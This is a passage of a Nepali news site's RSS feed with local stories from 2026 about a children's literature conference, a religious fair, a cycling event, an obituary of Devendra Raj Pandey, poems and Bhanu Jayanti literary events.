बाल साहित्य बालबालिकाको मनोरञ्जनको माध्यम मात्र नभई उनीहरूको व्यक्तित्व विकास, संस्कार निर्माण, कल्पनाशीलता, सिर्जनात्मकता, वैज्ञानिक सोच र सामाजिक चेतना विकास गर्ने महत्वपूर्ण आधार हो । यसै मान्यतालाई आत्मसात् गर्दै सम्मेलनमा बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौती, शिक्षासँगको सम्बन्ध, प्रविधिको प्रभाव तथा अन्तर्राष्ट्रिय सहकार्यका विविध विषयमा विमर्श, संवाद, सिर्जनात्मक प्रस्तुति तथा साहित्यिक गतिविधिहरू सञ्चालन हुने जानकारी वक्तव्यमाफर्त दिइएको छ ।
सम्मेलनमा हुने मुख्यमुख्य कार्यक्रमहरू :
मङ्सिर ११ र १२ गते हुने दुई दिने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ अन्तर्गत सम्पन्न गरिने मुख्यमुख्य कार्यक्रमहरू समेत वक्तव्यमै जानकारी दिइएको छ ।
उक्त सम्मेलनमा हुने कार्यशालामा १) बालकथा लेखन कार्यशाला, २) कविता लेखन कार्यशाला, ३) निबन्ध लेखन कार्यशाला, ४) समीक्षा लेखन कार्यशाला, ५) चित्रकला लेखन कार्यशाला, ६) हस्तलेखन कार्यशाला, ७) अभिनय प्रशिक्षण कार्यशाला, ८) नृत्य प्रशिक्षण कार्यशाला र ९) देवनागरी लिपिमा हस्तलेखन हुने भनिएको छ ।
साथमा विषयक्षेत्रमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने समेत वक्तव्यमार्फत जानकारी दिइएको छ । ती हुन् ः क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति छ) हस्तलिपि प्रदर्शनी आदि छन् ।
यसैगरी, उक्त अवसरमा बीचबीचमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने जानकारी दिदै तिनमा क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति, छ) हस्तलिपि प्रदर्शनी रहेको उल्लेख छ ।
कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने आंकलन :
उक्त सम्मेलन सम्पन्न गर्नका लागि कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने अनुमान गरिएको छ, जसमध्ये ७ लाख समाजको केन्द्र र ५ लाख स्थानीय आयोजकले व्यवस्थापन गर्नुपर्ने बताइएको छ ।
एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू र पाँच सय जना विद्यार्थीहरूले भाग लिने :
उक्त सम्मेलनमा एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू तथा कपिलवस्तु जिल्लाका करिब पाँच सय जना विद्यार्थीहरूले भाग लिने साहित्यिक इतिहासको कालखण्डमा विरलै हुने जिल्लाको यो ऐतिहासिक सम्मेलन केवल बालसाहित्य वा सिर्जना क्षेत्रका लागि मात्र नभई सिङ्गो कपिलवस्तु र कपिलवस्तुवासीको गौरवको कार्यक्रम भएकाले यसमा हामी सबैको इज्जत र प्रतिष्ठा जोडिएको समाजद्वारा जारी वक्तव्यमा उल्लेख छ ।
सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहने बताइएको छ ।
यस सम्मेलनले कपिलवस्तुको ऐतिहासिक तथा पुरातात्त्विक महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरमा थप परिचित गराउनुका साथै साहित्यिक, सांस्कृतिक तथा ऐतिहासिक पर्यटनको विकास र प्रवर्धनमा समेत महत्वपूर्ण योगदान पु¥याउनुका साथै यस पवित्र तिलौराकोटलाई विश्व सम्पदा सूचीमा सूचीकृतको लागि टेवा पुग्ने अपेक्षा गरिएको जारी वक्तव्यमा भनिएको छ ।
गौतमबुद्धको बाल्यकालसँग सम्बन्धित प्राचीन कपिलवस्तुको ऐतिहासिक विरासत,विश्व रामसार सूचीमा सूचीकृत जगदिशपुर सिमसार क्षेत्रको अद्वितीय प्राकृतिक सौन्दर्य, साहित्यकार भवानी भिक्षुको साहित्यिक योगदान तथा कुदानलगायतका महत्वपूर्ण सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै आयोजना हुन लागेको यो सम्मेलनले कपिलवस्तुको इतिहास, साहित्य, संस्कृति र पर्यटनलाई विश्वमञ्चमा प्रस्तुत गर्ने महत्वपूर्ण आधार निर्माण गर्ने विश्वास गरिएको छ । यस सम्मेलनको सफल आयोजनाका लागि स्थानीय मूल आयोजक समिति, कपिलवस्तुले नेपाल सरकार, प्रदेश सरकार, स्थानीय तह, पुरातत्व तथा पर्यटन क्षेत्रसँग सम्बन्धित निकाय, साहित्यिक तथा शैक्षिक संस्था, सञ्चारमाध्यम, साहित्यकार, शिक्षक, अभिभावक, विद्यार्थी तथा सम्पूर्ण साहित्यप्रेमी महानुभावहरूमा सक्रिय सहयोग, सहभागिता र सहकार्यका लागि हार्दिक आह्वान गर्दछ वक्तव्यमा उल्लेख छ ।
रमेशचन्द्र घिमिरेको सहयोगमा ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50229 0
नेपालका प्रथम जगत गुरु देवाचार्य मोहनशरण लमजुङमा https://www.antaranganews.com/?p=50162 https://www.antaranganews.com/?p=50162#respond Sun, 19 Jul 2026 12:41:17 +0000 https://www.antaranganews.com/?p=50162 पाउँदी(लमजुङ)– नेपाल राष्ट्का प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री लमजुङ आउनु भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा निर्मित नक्षत्र वाटिकाको साथमा भोलिबाट सुरु हुने श्रावणी बोलबम मेलाको साउन ४ गते समुदघाटनका लागि उहाँ आउनु भएको हो ।
स्वामी महाराजको मुक्तिनाथ गएर फर्कने क्रममा यो जिल्लामा पहिलो पटक यस धाममा आउनु भएको हो । मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर उहाँ भोलि साँझ चतराधाम फर्कनु हुने कार्यक्रम तय भएको ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउनको पहिलो सोमबार शुभारम्भ गरिने छ । साथमा उहाँले नक्षत्र वाटिकाको समेत उदघाटन गर्नु हुने भएको छ । आश्रम हातामा २७ नक्षत्र, १२ राशी र नौ ग्रहको वाटिका निर्माण गरिएको छ । यो वाटिका गण्डकी प्रदेशमै पहिलो भएको ओलियाले जानकारी दिनुभयो ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ ।
नेपालका प्रथम जगद्गुरुको दिव्य दर्शन र प्रवचन श्रवणका लागि समय मिलाउनु र समयमै उपस्थित हुन सम्पूर्ण भक्तजन महानुभावहरूलाई आयोजक संस्थाका परिकल्पनाकार एवम् अध्यक्ष ओलियाले आग्रह गर्नु भएको छ । उहाँले भन्नुभयो, ‘हामीले गत बर्ष श्रावण महिनाभर सर्वोदयमा पहिलो पटक बोलबम मेला आयोजना भएकोमा यस बर्ष गत बर्ष भन्दा भब्य रुपमा बोलबम आयोजना गर्ने तयारी पुरा भएको छ ।’
वालसन्त मोहनशरण देवाचार्य महाराजश्री आज लमजुङमा आउनु भएर राइनासकोटको दृश्यावलोकन गर्नु भई साँझको बसाई सर्वोदय सेवाश्रममा नै हुने भएको र आफूहरू उहाँको साथमा त्यसतर्फ गएर फर्किदै गरेको ओलियाले जानकारी दिनु भएको छ ।
उद्घाटन समारोहमा जिल्लाका राइनास, धमिलीकुवा, कुन्छा, परेवाडाँडा, सुन्दरबजार, बेसीशहर लगायतका स्थानबाट आउने भजन मण्डलीले संगीतमय भजन कीर्तनसमेत प्रस्तुत गर्ने कार्यक्रम छ ।
बोलबम धार्मिक मेलामा धर्मनाध धाममा १०८ गोमुखी धारामा स्नान, १०८ शिवलिङ्गमा जलार्पण, कैलाश पर्वत परिक्रमा, १००८ शालीग्रामको दर्शनलगायत धार्मिक अनुष्ठानका पूजाअर्चना, कथावाचन, भजन किर्तन कार्यक्रम साउन महिनाभर गरिने छ ।
साथै, साउनका ११, १८ र २५ गते पर्ने सोमबार धर्मनाथ धाममा बोलबमसहित विशेष पूजा अर्चनासहितका धार्मिक अनुष्ठान हुने तयारी छ । ती दिनमा नियमित हवन, रूद्रिपाठ, प्राण प्रतिष्ठा, पूजा पाठ आध्यात्मिक गुरूहरूको विशेष प्रवचन, भजन किर्तन तथा धार्मिक सांस्कृतिक प्रस्तुतिका साथमा शिवलिङ्ग जलाभिषेक, प्रसाद वितरण हुने छ । साउनको अन्तिम सोमबार विशेष पुजा सहित पूर्णाहुति गरी समापन गरिने सर्वोदय सेवाश्रमका अध्यक्ष ओलियाले जानकारी दिनु भएको छ ।
मानवीय सेवासँगै आश्रमलाई गण्डकी प्रदेशकै उत्कृष्ट धार्मिक केन्द्रको रूपमा विकास गर्ने लक्ष्य साथ विभिन्न धार्मिक संरचनाहरूको निर्माण गरिएका छन् ।
सर्वोदय सेवाश्र रहेको धर्मनाथ धाम विश्वको नयाँ धार्मिक केन्द्र तथा गन्तव्यका रुपमा विकसित हुँदैछ ।
]]>
https://www.antaranganews.com/?feed=rss2&p=50162 0
चौथो कोरा– २०२६ ‘झरनादेखि झरनासम्म’ कार्यक्रमको हामखोेलामा समापन : फोटो फिचर https://www.antaranganews.com/?p=50127 https://www.antaranganews.com/?p=50127#respond Sat, 18 Jul 2026 15:29:35 +0000 https://www.antaranganews.com/?p=50127 बेसीशहर– लमजुङमा ‘झरनादेखि झरनासम्म कोरा– २०२६’ को चौथो कार्यक्रम सम्पन्न भएको छ । सो कार्यक्रम साइक्लिङ संघ लमजुङको सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मस्र्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म अगष्टको तेस्रो शनिबार साउन २ गते गरिएको हो ।
‘कोरा– २०२६’मा आठ महिलासमेत ६५ जना साइकल धावकले भाग लिएको आयोजकको भनाइ छ । सो कार्यक्रममा आठ वर्षका बालक प्रज्ञा गुरुङदेखि ६५ वर्षका जेष्ठ नागरिकले समेत भाग लिएका थिए ।
समापनमा सहभागी सबैलाई आयोजक संस्था साइक्लिङ संघ लमजुङका अध्यक्ष ध्रुवराम प्रधानले मेडल प्रदान गर्नु भएको थियो । त्यस्तै, एक जनालाई गोलाप्रथाद्वारा गरिएको अन्नपूर्ण गिफ्ट ह्याम्परबाट उपलब्ध गिफ्ट ह्याम्पर पनि प्रदान गरिएको थियो ।
समापन स्थल हामखोला झरनामा आयोजक संस्थाबाट पत्रकार सम्मेलन समेत गरी आउँदो भदौको तेस्रो साता अर्थात १९ गतेदेखि २१ गतेसम्म तीन दिने राष्ट्रव्यापी खुला ‘प्रथम टुर दि लमजुङ २०२६’हुने जानकारी दिइएको थियो ।
उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=50127 0
नागरिक अगुवा डा. देवेन्द्रराज पाण्डेको निधन https://www.antaranganews.com/?p=50119 https://www.antaranganews.com/?p=50119#respond Sat, 18 Jul 2026 03:57:36 +0000 https://www.antaranganews.com/?p=50119 काठमाडौं– नागरिक अभियन्ता डा. देवेन्द्रराज पाण्डेको निधन भएको छ । उहाँको यहाँको विशालनगरस्थित निवासमा साउन १ गते साँझ ७ बजेर ४० मिनेटमा निधन भएको चिकित्सक डा. अनुप सुवेदीले जानकारी दिनु भएको हो । क्यान्सरबाट पीडित पाण्डेको ८७ वर्षको हुनुहुन्थ्यो ।
उहाँको अघिल्लो दिनमात्र ह्याम्स अस्पताल र पाटन अस्पतालमा उपचार गरिए पनि उपचार सम्भव नभएपछि घरमै ल्याइएको थियो । ‘उहाँ ५–६ महिनादेखि प्याङ्क्रियाजको क्यान्सरसँग लडिरहनुभएको थियो,’ डा. सुवेदीले भन्नुभयो, ‘बिहीबार दुखाई बढेपछि उहाँलाई ह्याम्स र पाटन अस्पताल लगेर उपचार गरेर घरै लगिएको थियो ।’ उहाँको अन्तिम घडीको आभास भएपछि परिवारले घरै लैजाने निर्णय गरेको थियो । करिब तीन महिनाअघि क्यान्सर प्रमाणित भएपछि उहाँ पीडा कम गर्ने औषधिको सहायता तथा नियमित उपचारसहित घरमै आराम गरेर बस्नु् भएको थियो ।
४० को दशकबाट सार्वजनिक अभियानमा होमिएका पाण्डे नेपालमा स्वावलम्बन अभियान सञ्चालनकर्ता मध्येका एक हुनुहुन्थ्यो ।
२०१७ सालमा निजामती सेवामा प्रवेश गरेका पाण्डे ३९ वर्षकै उमेरमा अर्थ मन्त्रालयको सचिव बन्नुभएको थियो । १९७८–१९८० सम्म अर्थसचिव हुनु भएका उहाँले तत्कालीन प्रधानमन्त्री सूर्यबहादुर थापासँग विवाद भएपछि राजीनामा दिनु भएको थियो । उहाँलाई नेपालका उत्कृष्ट अर्थ सचिवहरूको सूचीमा राख्ने गरिएको छ । उहाँले पदबाट स्वेच्छिक राजीनामा दिएर बहुदलको पक्षमा लाग्नु भएको थियो । २०४६ सालको जनआन्दोलनमा पेसागत फोरमबाट प्रजातन्त्र पुनः स्थापनाका लागि लडेका पाण्डे त्यसपछि गठिन कृष्णप्रसाद भट्टराई नेतृत्वको अन्तरिम सरकारमा अर्थमन्त्री हुनुहुन्थ्यो ।
उक्त अन्तरिम सरकारमा नेपाली कांग्रेस र वाममोर्चा बाहेकबाट दुई जना स्वतन्त्र नागरिक सरकारमा सामेल हुनुहुन्थ्यो । त्यसमध्ये डा. पाण्डे एक थिए भने डा. मथुरा श्रेष्ठ स्वास्थ्यमन्त्री बन्नु भएको थियो ।
संविधान जारी भएपछि २०४८ मा भएको आमनिर्वाचनमा पाण्डे लोक दल नामक पार्टी खोलेर पाल्पाबाट निर्वाचन समेत लड्नु भएको थियो ।
५० को दशकदेखि पाण्डे विभिन्न संघ–संस्थामार्फत सार्वजनिक जीवनमा सक्रिय रहनु भयो । भ्रष्टाचारविरूद्ध काम गर्ने ट्रान्सपरेन्सी इन्टरनेसनल नेपालका संस्थापकमध्ये एक उहाँ मानवअधिकार क्षेत्रमा पनि सक्रिय हुनुहुन्थ्यो ।
भारतका पूर्वप्रधानमन्त्री आइके गुजराल, पाकिस्तानी आस्मा जहाँगिरहरूसँग मिलेर डा. पाण्डेले साउथ एसियन फर ह्युमन राइट्स स्थापना गर्नु भएको थियो । केही समय निष्क्रिय रहेका पाण्डे माओवादी द्वन्द्व उत्कर्षतिर अघि बढेपछि शान्ति प्रक्रिया सुरू गर्न नागरिक तहबाट सक्रिय बन्नु भएको थियो ।
बंगलादेशमा युनुस अन्सारीले लघुवित्त अभियान थालेकै बेला डा. पाण्डेकै अगुवाइमा सन् ८० को दशकमा नेपालमा पनि त्यस्तै अभियान सुरू भएको नागरिक आन्दोलनका अर्का अभियन्ता डा. भाष्कर गौतम बताउँछन् ।
उहाँले नेपालको अर्थनीति, लोकतन्त्र, विकास तथा अन्तर्राष्ट्रिय सहयोगलगायत विषयमा नेपाली तथा अंग्रेजी दुवै भाषामा धेरैवटा पुस्तकहरु लेख्नु भएको छ । ‘नेपाल्स फेल्ड डेभलपमेन्ट’, ‘लुकिङ एट डेभलपमेन्ट एन्ड डोनर्स’, ‘नेपाली अर्थराजनीति’, ‘अर्थ–राजनीतिक विसङ्गति’, ‘नागरिक आन्दोलन र गणतान्त्रिक चेतना’, ‘लोकतन्त्रको प्राण–प्रतिष्ठा’, ‘एक ज्यान, दुई जुनी’ लगायत उहाँका प्रमुख पुस्तकहरू हुन् ।
‘मुलुकमा सशस्त्र द्वन्द्व चर्किँदै गएपछि उहाँ शान्ति स्थापनाका लागि सक्रिय रहनुभयो,’ अध्येता गौतमले भन्नुभयो, ‘२०६२–६३ को जनआन्दोलनमा उहाँले नागरिक आन्दोलनको अगुवाइ गर्नुभयो ।’
त्यस्तै, लेखक, पत्रकार तथा नागरिक आन्दोलनकारी नारायण वाग्लेले पाण्डेलाई ‘नागरिक स्वतन्त्रता, समानता, हक र चेतनाका पक्षमा सधैं खरो उभिने, लोकतन्त्रका लागि जहिल्यै संघर्षको समन्वय गर्दै नयाँ पुस्तालाई नित्य हौस्याइरहने हाम्रा अगुवा देवेन्द्रराज पाण्डे’ भनेर सम्झना गर्नु भएको छ ।
पाण्डेको निधनले नागरिक आन्दोलनले अगुवा गुमाएको भन्दै धेरैले उहाँप्रति श्रद्धा सुमन व्यक्त गरेका छन् ।
त्रिचन्द्र कलेजबाट स्नातक र भारतको इलाहावाद विश्वविद्यालयबाट अर्थशास्त्रमा स्नातकोत्तर गर्नु भएका डा. पाण्डेले अमेरिकाको पिट्सबर्ग विश्वविद्यालयबाट सार्वजनिक र अन्तर्राष्ट्रिय सम्बन्धमा विद्यावारिधि गर्नु भएको थियो ।
उहाँको आज साउन २ गते बिहान ११ बजे पशुपति आर्यघाटमा अन्तिम संस्कार गरिने पारिवारिक स्रोतले जानकारी दिएको छ ।
२० अगस्ट १९३९ मा काठमाडौंमा जन्मिएका स्वर्गीय पाण्डेकी श्रीमती पद्मा, छोरी प्रिनीति, ज्वाइँ र नाति छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50119 0
काजी बस्न्यातका चार मुक्तक https://www.antaranganews.com/?p=50097 https://www.antaranganews.com/?p=50097#respond Fri, 17 Jul 2026 04:22:16 +0000 https://www.antaranganews.com/?p=50097 तिमी छौ म छु अनि सुनसान रात छ
के दिउँ भगवान तिमीलाई यै हात छ
छोड्न नपरोस सम्झिन अनि चलाउन
खै किन नहुँदा चिन्ता हुँदा उन्मत्त छ ।

यै बन्छु बनाउछु भनेर मात्रै बन्न सकिन्न
आज के हुन्छ भोलि के हुन्छ भन्न सकिन्न
लिन पठाएका हुन कि दिन पठाएका हुन ?
मलाई भगवानले जान्नबुझ्न धन्न सकिन्न ।

हेर्दा हेर्दै बगायो जवानी बगर हुने भो
घर छैन परिवार छैन पर निर्भर हुने भो
कसैलाई मजा लाग्छ कसैलाई खेद छ
हेर्ने त मान्छेहरू नै हुन दिने खप्पर हुने भो ।

आँखा देख्दिनन् आमा ! छामेरै बाबु आईस् भनिन्
पानी निल्न नसक्नेछन उनी मलाई खाईस् भनिन् ।
खाएँ आमा, म खान आएको तिमी जान आएकी भनें
खै कान सुनिनन् कि आँखा देखिनन् नाईस भनिन् ।

लमजुङ

]]>
https://www.antaranganews.com/?feed=rss2&p=50097 0
काजी बस्नेतका दुई मुक्तक https://www.antaranganews.com/?p=50090 https://www.antaranganews.com/?p=50090#respond Thu, 16 Jul 2026 10:17:24 +0000 https://www.antaranganews.com/?p=50090 घरमा बस्नै मन छैन विभिषण बनेर
के काम घेरामा भक्ति लक्ष्मण बनेर ?
मैले जे जाने त्यै गरें जीवन चलाउन !
त्याग्नै उचित लाग्दैछ त्वम्शरण बनेर ।

कहाँ उँभो लाग्छ खानै नहुने कुरा खाए पछि !
मेरो नभै नहुने समय थियो गयो निदाए पछि
अहिल्यै हो तिम्रो अगाडि भएको मात्रै रोज !
भोलि के थाहा खोजेर बिर्सेला सम्झाए पछि ।
बेसीशहर नगरपालिका– २, लमजुङ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50090 0
८७ वर्षीया मेनका पौडेलको ‘मेरा चौरासी बर्ष’ पुस्तक लोकार्पण, पुरस्कार घोषणा https://www.antaranganews.com/?p=50039 https://www.antaranganews.com/?p=50039#respond Tue, 14 Jul 2026 02:42:46 +0000 https://www.antaranganews.com/?p=50039 काठमाडौं– साहित्यकार अञ्जना पौडेल खनालकी आमा ८७ वर्षीया मेनका पौडेलको ‘मेरा चौरासी बर्ष’ भव्य समारोह विच लोकार्पण भएको छ । उक्त कार्यक्रमका प्रमुख अतिथि वरिष्ठ साहित्यकार प्रा.डा. शैलेन्दु प्रकाश नेपालले २१३ औं भानु जयन्तीको अवसरमा सो कीर्तिको लोकार्पण गर्नुका साथै दोसल्ला ओढाएर विभिन्न छ संस्थाहरूबाट अभिनन्दन पत्र प्रदान गरी असार २८ गते सम्मान गरिएको थियो ।
मर्स्याङदी वाङ्मय प्रतिष्ठान, शताब्दी साहित्य प्रतिष्ठान, ठाकुर छाँगा स्मृति प्रतिष्ठान, तीर्थ स्मृति प्रतिष्ठान र एसिया प्यासिफिक स्कुलको सहकार्यमा भानुजयन्ती कार्यक्रम विभिन्न रोचक प्रस्तुतीहरू सहित उक्त कार्यक्रमको आयोजना गरिएको हो । लमजुङको ऐतिहासिक थलो दुराडाँडामा स्थायी बसोबास भएकी पौडेलले ८४ वर्षसम्म भोगेका भोगाइलाई समेटिएर तयार पारेको उक्त पुस्तक भानुजयन्तीका अवसरमा विमोचन गरिएको हो । उक्त कार्यक्रममा आयोजक संस्थाहरूले आमा मेनकालाई अभिनन्दन पत्रद्वारा सम्मान गरेका थिए ।
वरिष्ठ साहित्यकार प्रा.डा. शैलेन्दुप्रकाश नेपालले नेपाली भाषालाई जनसाधारणको पहुँचमा पु¥याउने तथा साहित्यिक अभिव्यक्तिलाई सरल, सहज र प्रभावकारी बनाउने कार्यमा भानुभक्त आचार्यको भूमिका अतुलनीय रहेको बताउनुभयो । प्रा. डा. नेपालले भानुभक्तले नेपाली भाषालाई साहित्यिक अभिव्यक्तिको माध्यमका रूपमा स्थापित गर्न महत्वपूर्ण भूमिका निर्वाह गर्नुभएको उल्लेख गर्नुभयो । भानुभक्तका कृतिले नेपाली साहित्यको जग बलियो बनाउनुका साथै पछिल्ला पुस्ताका स्रष्टालाई सिर्जनशील बन्न प्रेरणा दिएको उहाँको भनाइ थियो । उहाँले विमोचित कीर्तिले समाजमा यौटा सन्देश दिएको छ, त्यो कीर्ति प्रकाशन गर्ने परिवारबाट हामी सबैले सिक्न सक्छौं भन्नुभयो ।
प्रा.डा. सर्वराज आचार्यले भानुभक्तले नेपाली भाषाको विकास, विस्तार र लोकप्रियतामा महत्वपूर्ण योगदान पु¥याएको बताउनुभयो । उहाँले भानुभक्तको कृतिलाई चिनाउनका लागि मोतिराम भट्टले भूमिका खेलेको उल्लेख गर्नुभयो ।
प्रा.डा. भागवत ढकालले पृथ्वीनारायण शाहले नेपालको भूगोल एकीकरण गरेर विशाल मुलुक निर्माण गरेजस्तै भानुभक्तले भाषिक एकीकरण गरेको बताउनुभयो । उहाँले नेपालमा भात्र नभई भारत, भुटान र वर्मामा भानुभक्तलाई उत्तिकै आदरसत्कार गर्ने गरेको उल्लेख गर्नुभयो ।
कार्यक्रममा वरिष्ठ पत्रकार एवम् साहित्यकार सोमनाथ घिमिरे र डा. उत्तम पौडेलले विमोचित कीर्तिको विभिन्न कोणबाट समिक्षा गर्नु हुँदै आ–आफ्ना धारणा व्यक्त गर्नु भएको थियो ।
सो अवसरमा नेपाली भाषाको विकास र विस्तारमा आदिकवि भानुभक्त आचार्यको योगदान महत्वपूर्ण रहेको भन्दै कार्यक्रमका वक्ताले नेपाली भाषा र साहित्यको विकासमा भानुभक्त आचार्यको योगदान आज पनि सान्दर्भिक भएको बताएका थिए ।
उक्त पावन अवसरमा विभिन्न संस्थाबाट आमा ‘मेनका’लाई अभिनन्दन गरिएको थियो, आमा खुशी हुनु भयो ।
आमाको यो पुस्तक आमाको जीवनी मात्र होइन त्यो समयदेखि यो समयसम्मको ऐतिहासिक दस्तावेज बन्नेमा म ढुक्क छु । आमाले जसरी लेख्नु भयो, मलाई सुनाउनु भयो, मैले सम्पादन गरिदिएको मात्र हो साहित्यकार अञ्जनाले भन्नुभयो । उहाँले आमाको जीवन भोगाइको यो पुस्तक एक पटक अवश्य पढिदिनु होला भन्ने आग्रह गर्नु भएको छ ।
कार्यक्रममा ८७ वर्षीया मेनकाले आफ्ना अनुभव सुनाउनुका साथै मुखाग्र भएका केही काविताका पंक्तिसमेत सुनाउनु भएको थियो । उक्त अवसरमा दुईलाख रुपैयाँको अक्षयकोष स्थापना गरेर आमाबुबाको नामबाट आउँदो सालबाट भानुजयन्तीका अवसरमा ‘कमल– मेनका प्रतिभा पुरस्कार’बाट विभिन्न प्रतिभाहरू, गरिब तथा जेहेन्दार विद्यार्थीलाई र कमजोर आर्थिक अवस्था भएका व्यक्तिहरूलाई वितरण गर्ने घोषणा मेनकाका छोरा छोरीकोतर्फबाट गरिएको छ । साहित्यकार अञ्जनाले उक्त पुस्तक प्रकाशनको क्रममा प्रत्यक्ष भेटेर र बाहिर बसेर सहयोग गर्नु हुने मेरा माइती, मावली, घर परिवार, इष्टमित्र, साथीसंगी र मेरा शुभचिन्तक सबैमा हार्दिक आभार व्यक्त गर्नु भएको थियो ।
मर्स्याङदी वाङ्मय प्रतिष्ठानका अध्यक्ष विजयराज न्यौपानेले नेपाली भाषा र साहित्यको इतिहासमा भानुभक्त आचार्यको योगदान सदैव स्मरणीय रहने उल्लेख गर्नुभयो । उहाँले मर्स्याङदी वाङ्मय प्रतिष्ठानले हरेक वर्ष भानु जयन्तीका अवसरमा विभिन्न कार्यक्रम गरी मनाउँदै आएको स्मरण गर्नुभयो ।
तनहुँको चुँदीराम्घामा विसं १८७१ असार २९ गते जन्मनुभएका भानुभक्त आचार्यले संस्कृत भाषामा सीमित रहेको रामायणलाई सरल नेपाली भाषामा अनुवाद गरी आमजनतामाझ पुर्याउनुभएको थियो । भानुभक्तले रामायणका अतिरिक्त भक्तमाला, प्रश्नोत्तर, बधुशिक्षा लगायतका कृतिमार्फत नैतिक शिक्षा, धार्मिक चेतना र सामाजिक सन्देश प्रवाह गर्नुभएको थियो । उहाँका रचनाहरू सरल भाषा, मिठासपूर्ण शैली तथा जनजीवनसँग निकट भएकाले नेपाली साहित्यमा विशेष स्थान ओगट्न सफल भएका छन् ।
उक्त कार्यक्रममा लोककलाकार शान्ति शर्मा, विष्णुभक्त अधिकारी, कृष्ण गुरुङ, आशबहादुर तामाङलगायतले सांस्कृतिक कार्यक्रम प्रस्तुत गर्नुका साथै एशिया प्यासिफिक स्कूलका विद्यार्थीले भानुभक्तद्वारा रचित कविता वाचन गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50039 0
कला, संस्कृति, साहित्य अमूल्य निधि, नयाँ पुस्तामा हस्तान्तरण जरुरी : प्रजिअ खनाल, लमजुङ https://www.antaranganews.com/?p=50028 https://www.antaranganews.com/?p=50028#respond Mon, 13 Jul 2026 14:30:40 +0000 https://www.antaranganews.com/?p=50028 बेसीशहर– लमजुङमा २१३ औं भानु जयन्तीमा कविता प्रतियोगिता गरिएको छ । प्रमुख जिल्ला अधिकारी कृष्णप्रसाद खनालले सो प्रतियोगिताको उदघाटन गर्दै कला, संस्कृति, साहित्य अमूल्य निधि, नयाँ पुस्तामा हस्तान्तरण जरुरी छ असार २९ गते भन्नु भएको हो । सो प्रतियोगिता स्थानीय लक्ष्मीनारायण सामुदायिक पुस्तकालयले आयोजना गरेको हो ।
कविता प्रतियोगिताका विजेतालाई पुरस्कार वितरण गर्दै प्रजिअ खनालले प्रमुख आतिथ्य मन्तव्यका क्रममा कला, साहित्य, संस्कृति देशका अमूल्य निधि भएको बताउनुभयो । यिनलाई बचाएर नयाँ पुस्तामा हस्तान्तरण गर्नु हाम्रो जिम्मेवारी र कर्तव्य हो उहाँले भन्नुभयो । भानुको जन्म छिमेकी जिल्ला र मावली यही जिल्ला भएको हुँदा पनि हाम्रो भानुप्रति बढी लगाव हुनु स्वभाविक हुन्छ भन्दै उहाँले पछिल्ला वर्षमा अनुशासन, नैतिक शिक्षा, माया ममता जस्ता कुरा पातलिदै गएकोमा चिन्ता व्यक्त गर्नु भयो । उहाँले पठन संस्कृति विकसित देशमा आज पनि विद्यमान छ, त्यहाँ आज पनि पुस्तकालयमा गएर अध्ययन गर्ने, रेल यात्राका क्रममा अध्ययन गर्ने बानी छ तर हाम्रोमा यो विषयमा पनि कमी देखिन थालेको छ तर अध्ययन आवश्यक छ भन्नुभयो । यो कार्यक्रममा पनि विद्यार्थीहरूलाई बढी सहभागिता गराउन सकेको भए बेस् हुने थियो उहाँले सुझाउनु भयो । हामी हाम्रा सांस्कृतिक अमूल्य सम्पदाको पुस्तान्तरणमा लागौं उहाँले जोड दिदै दोहोर्याउनुभयो ।
अर्को एक प्रसङ्गमा उहाँले आयोजक पुस्तकालयको संरक्षण र प्रवर्द्धनका लागि आफ्नोतर्फबाट सक्दो सहयोग गर्ने उहाँले प्रतिवद्धता व्यक्त गर्नु भयो ।
